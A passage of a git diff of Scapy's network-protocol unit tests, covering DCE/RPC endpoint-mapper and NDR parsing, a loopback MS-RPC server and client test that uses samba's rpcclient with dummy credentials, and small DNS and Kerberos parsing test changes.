\xdc\xf9.qX\xbe\xdb\x9d7\xd8Ct\t\x08]Tsk\x10i9\xa6~6SN?[\x865+3%#x\xb9\x80H\x0e\xfd\xa9cW\x0c\xb6Y\x14<\xda\xc5 \xd0\xd6@r\xbb\xdbT\xadr\xa7O\x16\x07{]\xfea\xa5\xd7\xff\x03\xff\xd3\x1e\xfaS\xc7\xad@\x08\x83%\x97\xff\x9e}B]\xde\xac\x1a\xca\x9b\xa5\xa3+,Y\x86\xe5\x06k\xf2\xdbS\xfe\xdeL\xa4\xed\xad\xb6\xf8\xfa\xb2i\x7f=\xa6E]Bf*\xacKj\xda\x1a\xad.\xe12q\xea\x12\xeew\xc5\xaaK\xd8\xb1\x8eQ\x97\xb0\x99\x88uIM\x7fF\xabK\xd8m\x8fQ\x97\xb0\x99\n\xeb\x126_A]\xc2f\xc7\xa8K\xd8L\xa0.as\x15\xd4%lv\x94\xba\xa4"\x061\xeb\x92\x8a\xdc\x19\xb3.as\xa3\xd4%\xec\xbc\xa9\xb0.\xed\xcb\xee\xbd\xf9\xcc\xb7\x9d3\xd7\xbf>iU\x8bV\xd5\xc7*\xbdG V]Bf*\xacKj\xda\x1a\xad.\xe12q\xea\x12\xeew\xc5\xaaK\xd8\xb1\x8eQ\x97\xb0\x99\x88uIM\x7fF\xabK\xd8m\x8fQ\x97\xb0\x99\n\xeb\x126_A]\xc2f\xc7\xa8K\xd8L\xa0.as\x15\xd4%lv\x94\xba\xa4"\x061\xeb\x92\x8a\xdc\x19\xb3.as\xa3\xd4%\xec\xbc\xa9\xb0.\r\xed\xce\xd4dj\x1e]w\x85\x88kb\xcb=vS\x8b\xf3%d\xa6\xc2\xba\xa4\xa6\xad\xd1\xea\x12.\x13\xa7.\xe1~W\xac\xba\x84\x1d\xeb\x18u\t\x9b\x89X\x97\xd4\xf4g\xb4\xba\x84\xdd\xf6\x18u\t\x9b\xa9\xb0.a\xf3\x15\xd4%lv\x8c\xba\x84\xcd\x04\xea\x126WA]\xc2fG\xa9K*b\x10\xb3.\xa9\xc8\x9d1\xeb\x1267J]\xc2\xce\x9b\xd1\xebR\xf8\xb5\xdf\xc7\x1bT\xa1zT\xcf\x98t\xe2\xcbM\xeev%\x9f+~\xc7\x1ePC\x90\xb9\nj\x08.\x13\xa7\x86\xe0~W\xac\x1a\x82\x1d\xeb\x185\x04\x9b\x89XC\xd4\xf4g\xb4\x1a\x82\xdd\xf6\x185\x04\x9b\xa9\xb0\x86`\xf3\x15\xd4\x10lv\x8c\x1a\x82\xcd\x04j\x086WA\r\xc1fG\xa9!*b\x10\xb3\x86\xa8\xc8\x9d1k\x0867J\r\xc1\xce\x9b\x0fk\xc8\xc3\x1a\xf2\xb0\x86<\xac!\x0fk\xc8\xc3\x1a\xa2}\r\t\x9f\xa3\xe8q\xefy\xce\xf8uZ\xe4z\\&\xd6\x9c\x13\xe6w\xc5\x9csBe*\x99s\xc2e\xa2\xce9\xa9\xe8\xcf\xa8sN\xb8m\x8f5\xe7\x84\xcbT:\xe7\x84\xcbW2\xe7\x84\xcb\x8e5\xe7\x84\xcb\x84\xe6\x9cp\xb9J\xe6\x9cp\xd9\xd1\xe6\x9c\xf0c\x10{\xce\t\x97\x0b\xcd9\xe1r\xa3\xcd9\xe1\xe6M\xbc\\\xaf\xf898\x84\\\xaf\xfc\xd9:\xf5\xb9^\xf1w!\xe4z\xe5\xcf\xee)\xcf\xf5\xca\x99\xear=R\x7f*\xcc\xf5\xca\xdb\xae<\xd7+g\xe2\xe5z\xe5|\xf4\\\xaf\x9c\xad<\xd7+g\xa2\xe5z\xe5\\\xf4\\\xaf\x9c\xad,\xd7\xa3\xc4\x00%\xd7+\xe7\xa2\xe5z\xe5\\e\xb9^y\xde\x8c\x9e\xeb\xc3\xf22k\xee\xf2\x9f\n\xa9\xc7k\xac\x0b\xec\xe4\x99\x07N\x7fR\xee\x7f\x98\x97q\xbf+V^Ff*\xc8\xcb\xd8L\xc4\xbc\x8c\x1b\x8fXy\x19\xbb\xed1\xf226Sa^\xc6\xe6+\xc8\xcb\xd8\xec\x18y\x19\x9b\t\xe4el\xae\x82\xbc\x8c\xcd\x8e\x92\x97U\xc4 f^\xc6\xe6\x02y\x19\x9b\x1b%/c\xe7\xcd\xe8y9,\x07a\xbf\xf7\x0f1\x07!\x7f\x8f\x82\x1c\x84\xdd\xf6\x189\x08\x9b\xa90\x07a\xf3\x15\xe4 lv\x8c\x1c\x84\xcd\x04r\x106WA\x0e\xc2fG\xc9A*b\x103\x07\xa9xWh\xcc\x1c\x84\xcd\x8d\x92\x83p\xf7\xdd\x189(\xec\xd9\xe9\x84\xb8j\xf5\xe9\x06\xad-\x1b\x7f\x9b\xf4\xeb\xc5\xf2\xe4<\xd4g\xa7%I\xe4%\xd6!\x1b\x05J`E#GG\xbc\x07\xa2l\xc1\xa0\xb9o\x8c\x7f\xdf\xbakR\xcb\x9eM\xbfm\x80\xfc>\x99\x07\xf0\xc3r\xdb\xecg\xaf\x16\xdd:\xfa_\xeb\xf2\xd6\xd2\xac\xcaD\xcdx\x94\xdcV5\xca\xbb1\x91\x99\x11m\x96%#/Q\xa2$8I\x96\xd1\xb32\x15\xf1<\xb9\xd0\xdc\xd6yj1\x97:e\xef\xc8\x8e3\xd6\xa4\xc0\xbf\x9f\xac\xa0\xcd\xc8L\xc46/\xa8@\xaf_\xbd\xfc\xb2}9{\xe6\x16\xbd\xe0\xdc(-\xda\x8c\xccDl\xf3\x8dS\x85U\x9av~/sB\x93\x99O5:,\x1f\xd7\xa2\xcd\xc8L\xc46\x87\xdfk6~\x9d\x16mFf\xc2m\x0e\xe3\xb7\xfd#\xfd\xeb\xa4\x83m3^.[b\xb8\xf5\'\xd9\n\xf5wm)\xd9)\xc9\xb2\x835\xb0N\xbdS\x08\xec\xee\x11\xef\x8cl\xb3t\xc2\xb6\x92\x96s2F\x15e\x9c-\x18f*An?\xcd\xf1\xa4\xdeH\x8a\x82$Q\x1c)\x91dx\xccG\xed\x1a\xceY\xe7^c\xdf\xa4\xe6^\xe5\x89\xc4\xb2e\x10b\x9e\x10%\xe6\xcdGT\x96\xb7\x7fOw\xfb\xc8\xb2\xb0\xe1\x7f\xbf\xa9]\x03\xb9\xcdFV\xe4\r$ep\x90<\xcb;E\'\x1f~\xfc\x85\xcd\xafLt\xf7\x14\xba\xf2\xe4\xec\xd2\xe3\xaf\xb0c\x18lf\x15"[\xf0\x15\x08\x85i\xa5\xc70a\xef[CfF\xbeo-;\xb3[W[6\x11\xed}kg\xab\xe6M\xad\xf2~n\xe2\x96:\xc4\x99\xb8\n\x0e\xe4\xf7c\n\x06\x07\xc7J\x8c\xe0\xe0i\x89b\xf4F\x86\x0f?F\xc7\xe6\x97\x1e\xa3\xf3\x8c\x85\xb4r6\xd2`\xb0\x18\x18\xbb\xc5j\xb5\xd8lV=\xa3\xa7h\xde\xac\xedv\xe8\x8d\x9cAtr\x0e\xdeh\xe0i\x83\xc3@S\xffo\xf1\x1b\x15\x1d\x9d\xfb\xd2\x85\x0fL+\xf6\'\xbc\xdd\xfd\xcb\xea\x07P\xf9\x9c(\xb1\xa4\xa4\xd7;\x04Jd\r\x82DF\xbc\x97\xee\xca\xac\x96\x9f\xfc\xba\xe1\xa0y\xe5\xe6MV\xe7\x89\xce[\xb5\xe6\xf7\xcf\x99\xf2\x1f\xef\x98\x0e\xc9o\xcd~\xcc\xfeJ\xbb\xcb\xc89\x18\xe2\x7f\xd07~\xd6\xf7\xd4\xc6\x8c\x15\xe7\xca5\x9e\xb3E@\xfe\x8d\x0b\x88\xff\xd4\x85\x89\xb7\x8e\xaei\x9d\xba\xe6p\xfaOM\x9f\xde\x9b\xae5\xbf\xde\xbeEi\x8bO\xecH\x9dzy\xca\xa0a\x9b\xcb\x8c\xd6\x9a\x7fk\xc9\xd5_\x8e\xdd\x9cf\x9e\x99\xeey\xb3\xb0\xbao\x172_\xef\xe0\r2\'\tFI\xa6h\x92\x95\x9c\xe15DW\xa7\xf8\xb9v\xbf\x7f\\c\xed\'\xc4\xfe\xccw\x9b\x9eB\xa9\xdb\xb5\xee\xd6\x90\xb0\xdc\x83\xcc\x0c\xcb=\x94\x99\xa5H\x93\x853\x99\x8d&=i\xe3\xcc\xb4\xcdn\xd4\xf3\x16\x8e7\xe9\xc3\xdb>\xf7\xe3\xbf\xf3j.K\xe4\xe6\xd2\xf6w\xff\xf4\xe7$i\xd1vd&f\xdb_;\xb0.+\xbd\xc7\x96\x8e\x8b\x9c\x973O\xde\\ZT\x1e\xa1\xedu\xef\xb6=\x8c\xd9\xaf\xcd\x88\xf1\xbf\xcc(\xb2,\\x\xeb\x89!)}Z\xa0\xc4\xa3e\x94x 3\xc3\xe2\xc1\xf2f+e\xb5\x18\xacV\xdef\xe3Y;\xcf\xb0\xb4\x91\xe5X\xbdIO\x87\x8f\xf3\x9a\x87\xd2\xf7=\xfdm\xb9\x94W\xf7\xce\xa8\xf3\xce\x9eO\xe7\xa0\x8es\xd6H2\x12)\x894\xcd\x18YI\x10\xe4\x88\xdf\x94\xc2\xe6\x97n\x87\xc1h0q\x94\x8d\xa5-\xa4\xcd`\xe7\xcd\x81\xe3I\xda\xac7\x98)\x13e\x0f\xdf\x0enin\xc5\'\xaa\xad\xed\xb4\xd3\xf5V\xbdN\t\xfc\x11\xe4wz\x91T`\x1f%9\xbd s\xb2\x18\xf8W\xe9\xab\xbb\x89\xff\x03\x056\xf1\x00') + +conf.max_list_count = 500 +pkt = ept_lookup_Response(data) +towers = [protocol_tower_t(x.valueof("tower").tower_octet_string) for x in pkt.valueof("entries")] + +assert len(towers) == 430 +assert [x.floors[3].rhs.decode().rstrip("\x00") for x in towers if x.floors[3].protocol_identifier == 15] == [ + '\\PIPE\\InitShutdown', + '\\PIPE\\InitShutdown', + '\\pipe\\eventlog', + '\\PIPE\\atsvc', + '\\PIPE\\atsvc', + '\\PIPE\\atsvc', + '\\PIPE\\atsvc', + '\\PIPE\\atsvc', + '\\PIPE\\wkssvc', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\1b6ced1995aeaf47', + '\\pipe\\lsass', + '\\pipe\\lsass', + '\\PIPE\\ROUTER', +] + +tower = next(x for x in towers if x.floors[3].protocol_identifier == 15 and x.floors[3].rhs == b"\\PIPE\\ROUTER\x00") +assert tower.floors[0].uuid + += DCE/RPC 5 NDR: Test DEPORTED_CONFORMANTS with offsetted padding + +# From [MS-EERR] + +class EEUString(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRSignedShortField("nLength", None, size_of="pString"), + NDRFullPointerField( + NDRConfStrLenFieldUtf16("pString", "", size_is=lambda pkt: pkt.nLength), + deferred=True, + ), + ] + + +class ExtendedErrorParamTypesInternal(IntEnum): + eeptiLongVal = 3 + + +class ExtendedErrorParam(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [ + NDRInt3264EnumField("Type", 0, ExtendedErrorParamTypesInternal), + NDRUnionField( + [ + ( + NDRSignedIntField("value", 0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 3), + (lambda _, val: val.tag == 3), + ), + ), + ], + StrFixedLenField("value", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class EEComputerNamePresent(IntEnum): + eecnpPresent = 1 + eecnpNotPresent = 2 + + +class EEComputerName(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRInt3264EnumField("Type", 0, EEComputerNamePresent), + NDRUnionField( + [ + ( + NDRPacketField("value", EEUString(), EEUString), + ( + (lambda pkt: getattr(pkt, "Type", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + StrFixedLenField("value", "", length=0), + ( + (lambda pkt: getattr(pkt, "Type", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ], + StrFixedLenField("value", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class ExtendedErrorInfo(NDRPacket): + ALIGNMENT = (8, 8) + DEPORTED_CONFORMANTS = ["Params"] + fields_desc = [ + NDRRecursiveField("Next"), + NDRPacketField("ComputerName", EEComputerName(), EEComputerName), + NDRIntField("ProcessID", 0), + NDRLongField("TimeStamp", 0), + NDRIntField("GeneratingComponent", 0), + NDRIntField("Status", 0), + NDRShortField("DetectionLocation", 0), + NDRShortField("Flags", 0), + NDRSignedShortField("nLen", None, size_of="Params"), + NDRConfPacketListField( + "Params", + [], + ExtendedErrorParam, + size_is=lambda pkt: pkt.nLen, + conformant_in_struct=True, + ), + ] + +pkt = ndr_deserialize1(b'\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x04\x00\x02\x00\x01\x00\x01\x00\x04\x00\x00\x00\x08\x00\x02\x00\xc0\x03\x00\x00\x00\x00\x00\x00\xa5\xcfq`,\xea\xd9\x01\x02\x00\x00\x00!\x07\x00\x00L\x06\x00\x00\x01\x00\x00\x00\x03\x00\x03\x00\xc4\xfe\xfc\x99\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x02\x00\xc0\x03\x00\x00\x00\x00\x00\x00)fo`,\xea\xd9\x01\x03\x00\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x03\x00\x00\x00\x03\x00\x03\x00\n\x00\x00\x00\x03\x00\x03\x00\x06\x00\x00\x00\x03\x00\x03\x00!\x07\x00\x00\x04\x00\x00\x00D\x00C\x001\x00\x00\x00\x00\x00\x00\x00', ExtendedErrorInfo) + +assert isinstance(pkt.value, ExtendedErrorInfo) +assert pkt.value.max_count == 1 +assert pkt.value.Next.value.ProcessID == 960 +assert pkt.value.Next.value.TimeStamp == 133395140301514281 +assert [x.Type for x in pkt.value.Next.value.Params] == [3, 3, 3] + +assert pkt.value.ComputerName.value.value.valueof("pString") == b'D\x00C\x001\x00\x00\x00' +assert pkt.value.ProcessID == 960 +assert pkt.value.TimeStamp == 133395140301672357 +assert pkt.value.Status == 1825 +assert pkt.value.DetectionLocation == 1612 +assert pkt.value.Params[0].Type == 3 + + ++ MS-RPC client and server + +% The fact that all of this actually works is crazy to me. + += Functional: Define a MS-RPC server +% Same as in dcerpc.rst + +from scapy.layers.dcerpc import * +from scapy.layers.msrpce.all import * +from scapy.layers.msrpce.raw.ms_wkst import * + +class MyRPCServer(DCERPC_Server): + @DCERPC_Server.answer(NetrWkstaGetInfo_Request) + def handle_NetrWkstaGetInfo(self, req): + """ + NetrWkstaGetInfo [MS-SRVS] + "returns information about the configuration of a workstation." + """ + req = req[NetrWkstaGetInfo_Request] + req.show() + if req.Level != 0x00000064: + return None + return NetrWkstaGetInfo_Response( + WkstaInfo=NDRUnion( + tag=100, + value=LPWKSTA_INFO_100( + wki100_platform_id=500, # NT + wki100_ver_major=5, + wki100_computername=req.valueof("ServerName") + b"Server" + ), + ), + ndr64=self.ndr64, + ) + @DCERPC_Server.answer(NetrEnumerateComputerNames_Request) + def handle_NetrEnumerateComputerNames(self, req): + """ + NetrWkstaGetInfo [MS-SRVS] + "returns information about the configuration of a workstation." + """ + req = req[NetrEnumerateComputerNames_Request] + req.show() + return NetrEnumerateComputerNames_Response( + ComputerNames=PNET_COMPUTER_NAME_ARRAY( + ComputerNames=[PUNICODE_STRING(Buffer=x) for x in ["Scapy", "Foo", "Bar"]] + ), + ndr64=self.ndr64, + ) + += Functional: Define wrapper over samba's rpcclient +~ linux samba + +import subprocess + +# Create a temporary directory for config +TEMP_DIR = pathlib.Path(get_temp_dir()) +TEMP_DIR.chmod(0o0755) +print(TEMP_DIR) + +# required for smb.conf to work in standalone without root.. wtf +LOGS_DIR = TEMP_DIR / "logs" +LOCK_DIR = TEMP_DIR / "lock" +PRIVATE_DIR = TEMP_DIR / "private" +PID_DIR = TEMP_DIR / "pid" +CACHE_DIR = TEMP_DIR / "cache" +STATE_DIRECTORY = TEMP_DIR / "state" +NCALRPC_DIR = TEMP_DIR / "ncalrpc" + +for dir in [LOGS_DIR, LOCK_DIR, PRIVATE_DIR, PID_DIR, CACHE_DIR, STATE_DIRECTORY, NCALRPC_DIR]: + dir.mkdir() + +SMBD_LOG = LOGS_DIR / "log.smbd" +SMBD_LOG.touch() + +# smb.conf +CONF_FILE = get_temp_file(autoext=".conf") +CONF = """ +# Scapy unit tests rpcserver client + +[global] + lock directory = %s + private directory = %s + cache directory = %s + ncalrpc dir = %s + pid directory = %s + state directory = %s +""" % ( + LOCK_DIR, + PRIVATE_DIR, + CACHE_DIR, + NCALRPC_DIR, + PID_DIR, + STATE_DIRECTORY, +) + +print(CONF) + +with open(CONF_FILE, "w") as fd: + fd.write(CONF) + +def run_rpcclient(transport, command, debug=False): + args = [ + "rpcclient", + "-c", + command, + "%s:127.0.0.1[12345]" % transport, + "-p", "12345", + "-U", "User", "--password", "Password", + "--configfile", CONF_FILE, + ] + if debug: + args += ["-d 5"] + print(" ".join(args)) + proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) + return proc.communicate(timeout=10)[0] + += Functional: Start the MS-RPC server over NCACN_IP_TCP with NTLMSSP + +ssp = NTLMSSP( + UPN="User", + HASHNT=MD4le("Password"), + IDENTITIES={ + "User": MD4le("Password"), + }, + auth_level=DCE_C_AUTHN_LEVEL.PKT_INTEGRITY +) + +rpcserver = MyRPCServer.spawn( + DCERPC_Transport.NCACN_IP_TCP, + iface=conf.loopback_name, + ssp=ssp, + port=12345, + bg=True, +) + += Functional: Connect to it with DCERPC_Client over NCACN_IP_TCP with NTLMSSP + +client = DCERPC_Client( + DCERPC_Transport.NCACN_IP_TCP, + ssp=ssp, + ndr64=False, +) +client.connect(get_if_addr(conf.loopback_name), port=12345) +client.bind(find_dcerpc_interface("wkssvc")) + +req = NetrWkstaGetInfo_Request( + ServerName="Nice", + Level=0x00000064, # WKSTA_INFO_100 + ndr64=False +) +resp = client.sr1_req(req) + +assert isinstance(resp.valueof("WkstaInfo"), LPWKSTA_INFO_100) +assert resp.valueof("WkstaInfo").valueof("wki100_computername") == b"NiceServer" + += Functional: Start an endpoint mapper for NCACN_IP_TCP +~ linux samba needs_root + +* rpcclient is dumb and doesn't understand 'ncacn_ip_tcp:127.0.0.1[12345]' means: don't try the endpoint mapper +* ==> we must spawn an endpoint mapper on port 135 +* ==> we must be root. + +portmapserver = DCERPC_Server.spawn( + DCERPC_Transport.NCACN_IP_TCP, + iface=conf.loopback_name, + port=135, + bg=True, + portmap={ + find_dcerpc_interface("wkssvc"): 12345, + }, +) + += Functional: Connect to the server with samba's rpcclient over NCACN_IP_TCP with NTMLSSP +~ linux samba needs_root + +# Note: this is broken in rpcclient < 4.16 .. D: +# https://github.com/samba-team/samba/commit/b5e56a30dfd33e89cfb602b1e7480e210434d600 + +# Note: if this eventually crashes, consider checking whether rpcclient is now greater than 4.16 in github actions (ubuntu-latest) +import re +rpcver = subprocess.Popen(["rpcclient", "-V"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True).communicate()[0] +rpcver = tuple(int(x) for x in re.search(r"[^\d]+(\d+\.\d+\.\d+).*", rpcver).group(1).split(".")) + +if rpcver <= (4, 16, 0): + print("Skipping ncacn_ip_tcp test (broken rpcclient)") +else: + result = run_rpcclient("ncacn_ip_tcp", "wkssvc_enumeratecomputernames") + print(result.decode()) + assert b"Scapy" in result + += Functional: Close the endpoint mapper +~ linux samba needs_root + +try: + portmapserver.shutdown(socket.SHUT_RDWR) +except OSError: + pass + +portmapserver.close() + += Functional: Close the server + +# Close everything now +client.close() +try: + rpcserver.shutdown(socket.SHUT_RDWR) +except OSError: + pass + +rpcserver.close() + += Functional: Re-Start the same MS-RPC server over NCACN_NP + +rpcserver = MyRPCServer.spawn( + DCERPC_Transport.NCACN_NP, + iface=conf.loopback_name, + port=12345, + bg=True, +) + += Functional: Connect to it with DCERPC_Client over NCACN_NP + +client = DCERPC_Client( + DCERPC_Transport.NCACN_NP, + ndr64=False, +) +client.connect(get_if_addr(conf.loopback_name), port=12345) +client.open_smbpipe("wkssvc") +client.bind(find_dcerpc_interface("wkssvc")) + +req = NetrWkstaGetInfo_Request( + ServerName="Nice", + Level=0x00000064, # WKSTA_INFO_100 + ndr64=False +) +resp = client.sr1_req(req) + +# Close everything now +client.close() +try: + rpcserver.shutdown(socket.SHUT_RDWR) +except OSError: + pass + +rpcserver.close() + +assert isinstance(resp.valueof("WkstaInfo"), LPWKSTA_INFO_100) +assert resp.valueof("WkstaInfo").valueof("wki100_computername") == b"NiceServer" + += Functional: Re-Start the same MS-RPC server over NCACN_NP with SPNEGOSSP+NTLMSSP + +from scapy.layers.spnego import SPNEGOSSP + +ssp = SPNEGOSSP( + [ + NTLMSSP( + UPN="User", + HASHNT=MD4le("Password"), + IDENTITIES={ + "User": MD4le("Password"), + } + ) + ] +) + +rpcserver = MyRPCServer.spawn( + DCERPC_Transport.NCACN_NP, + iface=conf.loopback_name, + ssp=ssp, + port=12345, + bg=True, +) + += Functional: Connect to it with DCERPC_Client over NCACN_NP with NTLMSSP + +client = DCERPC_Client( + DCERPC_Transport.NCACN_NP, + ssp=ssp, + ndr64=False, +) +client.connect(get_if_addr(conf.loopback_name), port=12345, smb_kwargs={"debug": 5}) +client.open_smbpipe("wkssvc") +client.bind(find_dcerpc_interface("wkssvc")) + +req = NetrWkstaGetInfo_Request( + ServerName="Nice", + Level=0x00000064, # WKSTA_INFO_100 + ndr64=False +) +resp = client.sr1_req(req) + +assert isinstance(resp.valueof("WkstaInfo"), LPWKSTA_INFO_100) +assert resp.valueof("WkstaInfo").valueof("wki100_computername") == b"NiceServer" + += Functional: Connect to the server with samba's rpcclient over NCACN_NP with NTLMSSP +~ linux samba + +result = run_rpcclient("ncacn_np", "wkssvc_enumeratecomputernames") +print(result.decode()) +assert b"Scapy" in result + += Functional: Close the server + +# Close everything now +client.close() +try: + rpcserver.shutdown(socket.SHUT_RDWR) +except OSError: + pass + +rpcserver.close() diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 0c0093b45a2..88bd87c1021 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -23,12 +23,12 @@ dns_ans = retry_test(_test) val = dns_resolve(qname="google.com", qtype="A") assert val -assert inet_pton(socket.AF_INET, val.rdata) +assert inet_pton(socket.AF_INET, val[0].rdata) assert val == conf.netcache.dns_cache[b'google.com.;\x01'] val = dns_resolve(qname="google.com", qtype="AAAA") assert val -assert inet_pton(socket.AF_INET6, val.rdata) +assert inet_pton(socket.AF_INET6, val[0].rdata) assert val == conf.netcache.dns_cache[b'google.com.;\x1c'] = DNS labels diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 234c4447ffd..be9bff9aea6 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -4,7 +4,7 @@ # https://www.cloudshark.org/captures/fa35bc16bbb0?filter=kerberos -= AS-REQ += Parse AS-REQ pkt = IP(b'E\x00\x00\xd9\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x00\x00\x00\x00;o\x00X\x00\xc5\x00\x00j\x81\xba0\x81\xb7\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\n\xa3\x0e0\x0c0\n\xa1\x04\x02\x02\x00\x95\xa2\x02\x04\x00\xa4\x81\x9a0\x81\x97\xa0\x07\x03\x05\x00\x00\x01\x00\x10\xa1\x150\x13\xa0\x03\x02\x01\x01\xa1\x0c0\n\x1b\x08LOCALDC$\xa2\x13\x1b\x11SAMBA.EXAMPLE.COM\xa3&0$\xa0\x03\x02\x01\x02\xa1\x1d0\x1b\x1b\x06krbtgt\x1b\x11SAMBA.EXAMPLE.COM\xa5\x11\x18\x0f20150130151703Z\xa7\x06\x02\x04\x14\xe1\x18\xa7\xa8\x1d0\x1b\x02\x01\x12\x02\x01\x11\x02\x01\x10\x02\x01\x17\x02\x01\x19\x02\x01\x1a\x02\x01\x01\x02\x01\x03\x02\x01\x02') @@ -15,7 +15,7 @@ assert pkt.root.reqBody.sname.nameString[0] == b"krbtgt" assert pkt.root.reqBody.nonce == 0x14e118a7 assert pkt.root.reqBody.etype == [0x12, 0x11, 0x10, 0x17, 0x19, 0x1a, 0x1, 0x3, 0x2] -= KRB-ERROR += Parse KRB-ERROR pkt = IP(b'E\x00\x02c\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x7f\x00\x00\x15\x00X;o\x02O\x00\x00~\x82\x02C0\x82\x02?\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x1e\xa2\x11\x18\x0f19810206083031Z\xa4\x11\x18\x0f20150129151703Z\xa5\x05\x02\x03\t\xae\xc0\xa6\x03\x02\x01\x19\xa7\x13\x1b\x11SAMBA.EXAMPLE.COM\xa8\x150\x13\xa0\x03\x02\x01\x01\xa1\x0c0\n\x1b\x08LOCALDC$\xa9\x13\x1b\x11SAMBA.EXAMPLE.COM\xaa&0$\xa0\x03\x02\x01\x02\xa1\x1d0\x1b\x1b\x06krbtgt\x1b\x11SAMBA.EXAMPLE.COM\xab\x10\x1b\x0eNEEDED_PREAUTH\xac\x82\x01\x84\x04\x82\x01\x800\x82\x01|0\n\xa1\x04\x02\x02\x00\x88\xa2\x02\x04\x000\x82\x01R\xa1\x03\x02\x01\x13\xa2\x82\x01I\x04\x82\x01E0\x82\x01A07\xa0\x03\x02\x01\x12\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com07\xa0\x03\x02\x01\x11\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com07\xa0\x03\x02\x01\x03\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com07\xa0\x03\x02\x01\x01\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com07\xa0\x03\x02\x01\x01\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com0"\xa0\x03\x02\x01\x17\xa1\x1b\x1b\x19SAMBA.EXAMPLE.COMLOCALDC$0\t\xa1\x03\x02\x01\x02\xa2\x02\x04\x000\r\xa1\x04\x02\x02\x00\x85\xa2\x05\x04\x03MIT') @@ -32,7 +32,7 @@ assert pkt.root.eData.seq[3].padataValue == b"MIT" etype_info2 = pkt.root.eData.seq[1] assert etype_info2.padataValue.seq[0].salt == b'SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com' -= AS-REP += Parse AS-REP pkt = IP(b'E\x00\x05\x95\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x7f\x00\x00\x15\x00X;p\x05\x81\x00\x00k\x82\x05u0\x82\x05q\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0b\xa2H0F0D\xa1\x03\x02\x01\x13\xa2=\x04;0907\xa0\x03\x02\x01\x12\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com\xa3\x13\x1b\x11SAMBA.EXAMPLE.COM\xa4\x150\x13\xa0\x03\x02\x01\x00\xa1\x0c0\n\x1b\x08LOCALDC$\xa5\x82\x03\xafa\x82\x03\xab0\x82\x03\xa7\xa0\x03\x02\x01\x05\xa1\x13\x1b\x11SAMBA.EXAMPLE.COM\xa2&0$\xa0\x03\x02\x01\x02\xa1\x1d0\x1b\x1b\x06krbtgt\x1b\x11SAMBA.EXAMPLE.COM\xa3\x82\x03a0\x82\x03]\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x01\xa2\x82\x03O\x04\x82\x03K\t\x05\xd7\x91\xdc\x14\xaa\xe2\xfb\xcc\x85\x1f*?\xbau\xbc0\x0f\x80\x8bc\x87\xe5z\x1a4i\xa3\x9bL[-\xb1\xb7\xaa\xd9-\x01\xc2\xf2\xdfs\x17<\xf3&\x99\'1\xfa\x80\xd9\x02\xae\xf5\xb3S\x14\xc2L\xc3e\xc9\x94\x03dH\xe2\xa9\xfd\x9a\xc6\xffs\x10\xf3er\xbd\xa0\xfep[~\x82+\xde0\x91%tc\xdcx\xfe\xd0\xd8\xc4\xb6u\x91\xe7\xe1C\x00y\xb8\x15\xd9\x91j\x0f\xe7\xa0\xe24m\xd94\xe5.I\xc51\x8f\x1do\t\xe9\x98\xb8\xad\xa6\x92\xf3\x15f\xc98o\x92\x0ch\x08\\\x8f\xab\xfau\xaf\x19v\xcc\xcb!v\xb5v2\xeb(h\x1c+o\xea\xc3\x0b\xcf\x81\xc8\x89\xe8i\xdd?\xd1\xaa\x0f3\xc9\xe9\xf2\xd7\x8a\x93`\x02\x9d\xb2 